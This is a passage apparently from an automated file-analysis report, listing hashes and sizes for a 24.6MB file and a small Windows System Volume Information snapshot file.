MD50a8c38c954a1f3419e2155d74928c358
SHA1b5de752e88c4df00c4b5388e5a6a03f04bfc1ee5
SHA2569a55b24aba8d326f0a83755af19492dd69e80f7212b0e356bf29b725a8a58c03
SHA512a8442cb29906298994f04107cfc93ddaa05bcd6471d758ad34956fb4186dced4c914de7632c3573c0949d0c9a5a09b5e1cf9ec3c13be3641586c518a40be2232
-
Filesize
24.6MB
MD505b3e599ede301b2fb8b687b64e7fd38
SHA1ab4f759c197567fbd85a4dd0c9e42adeccd8bda8
SHA256079c9d29eabd97997e43c5970192c49cb8fd31e24ede91eef76ab1ddd77e0254
SHA5122237afb779ed4cbba6522931e92fb28806bcadb4fc5cfa2eb794cfcd35ee60bfe33a303bf033ffea11e94d400e4926fd8519fce86fdc40ae9f65820ea793913e
-
\??\Volume{f82ec716-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{9da9cbdc-2630-4d85-9cc8-9bf40dae2eca}_OnDiskSnapshotProp
Filesize6KB
MD5441f4b71a10be4ad5aebf2a6f0b7b0b5
SHA197921ae7bfcd947e0433300cf0a8213213937c66
SHA256d103b1c3129583bb2575386bef0ef8de29b52dc354de74e0dfa83b6c3eaab43f
SHA5122c8b9153ce275acf0a52d6c8fdeca6e6789a333cac84a22d93b82bbb67c11da3ce3fb471a55051217153e05cb6f91b2d69c99a6d3d1451f6cfccc4e068296c43